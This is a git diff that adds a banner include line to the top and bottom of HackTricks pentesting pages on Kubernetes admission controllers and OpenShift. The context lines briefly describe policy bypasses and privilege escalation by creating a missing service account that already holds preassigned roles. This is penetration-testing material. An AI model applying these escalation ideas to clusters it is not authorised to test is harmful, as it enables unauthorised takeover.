@@ -64,3 +66,4 @@ Another way to bypass policies is to focus on the ValidatingWebhookConfiguration
 
 For more info check [https://madhuakula.com/kubernetes-goat/docs/scenarios/scenario-22/securing-kubernetes-clusters-using-kyverno-policy-engine/welcome/](https://madhuakula.com/kubernetes-goat/docs/scenarios/scenario-22/securing-kubernetes-clusters-using-kyverno-policy-engine/welcome/)
 
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md b/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md
index 869a331c03..8b731f3cef 100644
--- a/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md
@@ -1,5 +1,7 @@
 # Kubernetes - OPA Gatekeeper
 
+{{#include ../../../banners/hacktricks-training.md}}
+
 **The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
 
 ## Definition
@@ -77,3 +79,4 @@ When Gatekeeper is deployed in the Kubernetes cluster, it will enforce this poli
 
 
 
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md b/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md
index bd65c3f845..268e0d5612 100644
--- a/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md
@@ -1,5 +1,7 @@
 # Kubernetes OPA Gatekeeper bypass
 
+{{#include ../../../banners/hacktricks-training.md}}
+
 **The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
 
 ## Abusing misconfiguration
@@ -64,3 +66,4 @@ Another way to bypass constraints is to focus on the ValidatingWebhookConfigurat
 
 
 
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md b/src/pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md
index 00b49b2fa2..70d3426d02 100644
--- a/src/pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md
@@ -1,5 +1,7 @@
 # Kubernetes ValidatingWebhookConfiguration
 
+{{#include ../../banners/hacktricks-training.md}}
+
 **The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
 
 ## Definition
@@ -103,3 +105,4 @@ abusing-roles-clusterroles-in-kubernetes/
 
 
 
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/openshift-pentesting/README.md b/src/pentesting-cloud/openshift-pentesting/README.md
index a49b1a3d63..3f05d0f569 100644
--- a/src/pentesting-cloud/openshift-pentesting/README.md
+++ b/src/pentesting-cloud/openshift-pentesting/README.md
@@ -1,5 +1,7 @@
 # OpenShift Pentesting
 
+{{#include ../../banners/hacktricks-training.md}}
+
 ## Basic Information
 
 {{#ref}}
@@ -20,3 +22,4 @@ openshift-privilege-escalation/
 
 
 
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/openshift-pentesting/openshift-basic-information.md b/src/pentesting-cloud/openshift-pentesting/openshift-basic-information.md
index e3e5a95508..d66bf9bc8b 100644
--- a/src/pentesting-cloud/openshift-pentesting/openshift-basic-information.md
+++ b/src/pentesting-cloud/openshift-pentesting/openshift-basic-information.md
@@ -1,5 +1,7 @@
 # OpenShift - Basic information
 
+{{#include ../../banners/hacktricks-training.md}}
+
 ## Kubernetes prior b**asic knowledge** <a href="#a94e" id="a94e"></a>
 
 Before working with OpenShift, ensure you are comfortable with the Kubernetes environment. The entire OpenShift chapter assumes you have prior knowledge of Kubernetes.
@@ -41,3 +43,4 @@ https://docs.openshift.com/container-platform/3.11/architecture/additional_conce
 
 
 
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md b/src/pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md
index 306d8660a9..f6e7b12dac 100644
--- a/src/pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md
+++ b/src/pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md
@@ -1,5 +1,7 @@
 # OpenShift - Jenkins
 
+{{#include ../../../banners/hacktricks-training.md}}
+
 **The original author of this page is** [**Fares**](https://www.linkedin.com/in/fares-siala/)
 
 This page gives some pointers onto how you can attack a Jenkins instance running in an Openshift (or Kubernetes) cluster
@@ -40,3 +42,4 @@ openshift-jenkins-build-overrides.md
 
 
 
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md b/src/pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md
index d17a6c6415..f4f5651f64 100644
--- a/src/pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md
+++ b/src/pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md
@@ -1,5 +1,7 @@
 # Jenkins in Openshift - build pod overrides
 
+{{#include ../../../banners/hacktricks-training.md}}
+
 **The original author of this page is** [**Fares**](https://www.linkedin.com/in/fares-siala/)
 
 ## Kubernetes plugin for Jenkins
@@ -275,3 +277,4 @@ pipeline {
 
 
 
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md
index a5ab6e5510..8044a06cb1 100644
--- a/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md
+++ b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md
@@ -1,5 +1,7 @@
 # OpenShift - Privilege Escalation
 
+{{#include ../../../banners/hacktricks-training.md}}
+
 ## Missing Service Account
 
 {{#ref}}
@@ -20,3 +22,4 @@ openshift-scc-bypass.md
 
 
 
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md
index b6db841010..b04190f006 100644
--- a/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md
+++ b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md
@@ -1,5 +1,7 @@
 # OpenShift - Missing Service Account
 
+{{#include ../../../banners/hacktricks-training.md}}
+
 ## Missing Service Account
 
 It happens that cluster is deployed with preconfigured template automatically setting Roles, RoleBindings and even SCC to service account that is not yet created. This can lead to privilege escalation in the case where you can create them. In this case, you would be able to get the token of the SA newly created and the role or SCC associated. Same case happens when the missing SA is part of a missing project, in this case if you can create the project and then the SA you get the Roles and SCC associated.
@@ -24,3 +26,4 @@ https://github.com/maxDcb/OpenShiftGrapher
 
 
 
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md
index 7622ca20bb..e8d2428d97 100644
--- a/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md
+++ b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md
@@ -1,5 +1,7 @@
 # Openshift - SCC bypass
 
+{{#include ../../../banners/hacktricks-training.md}}
+
 **The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
 
 ## Privileged Namespaces
@@ -139,3 +141,4 @@ To bypass GateKeeper's rules and set this label to execute a cluster takeover, *
 
 
 
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md
index 6fb72c8e7a..5b9a088c22 100644
--- a/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md
+++ b/src/pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md
@@ -1,5 +1,7 @@
 # OpenShift - Tekton
 
+{{#include ../../../banners/hacktricks-training.md}}
+
 **The original author of this page is** [**Haroun**](https://www.linkedin.com/in/haroun-al-mounayar-571830211)
 
 ### What is tekton
@@ -76,3 +78,4 @@ spec:
 
 
 
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/openshift-pentesting/openshift-scc.md b/src/pentesting-cloud/openshift-pentesting/openshift-scc.md
index 3a935d8c71..9dbf812f2d 100644
--- a/src/pentesting-cloud/openshift-pentesting/openshift-scc.md
+++ b/src/pentesting-cloud/openshift-pentesting/openshift-scc.md
@@ -1,5 +1,7 @@
 # Openshift - SCC
 
+{{#include ../../banners/hacktricks-training.md}}
+
 **The original author of this page is** [**Guillaume**](https://www.linkedin.com/in/guillaume-chapela-ab4b9a196)
 
 ## Definition
@@ -69,3 +71,4 @@ openshift-privilege-escalation/openshift-scc-bypass.md
 
 
 
+{{#include ../../banners/hacktricks-training.md}}